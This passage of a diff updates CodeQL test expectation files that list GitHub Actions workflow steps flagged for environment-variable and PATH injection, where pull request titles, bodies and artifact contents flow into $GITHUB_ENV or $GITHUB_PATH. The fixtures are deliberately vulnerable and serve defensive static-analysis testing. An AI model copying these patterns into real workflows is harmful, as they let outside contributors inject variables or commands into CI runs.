Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 6ad5cf04304..aff785242f9 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | @@ -72,6 +71,12 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -90,12 +95,18 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho 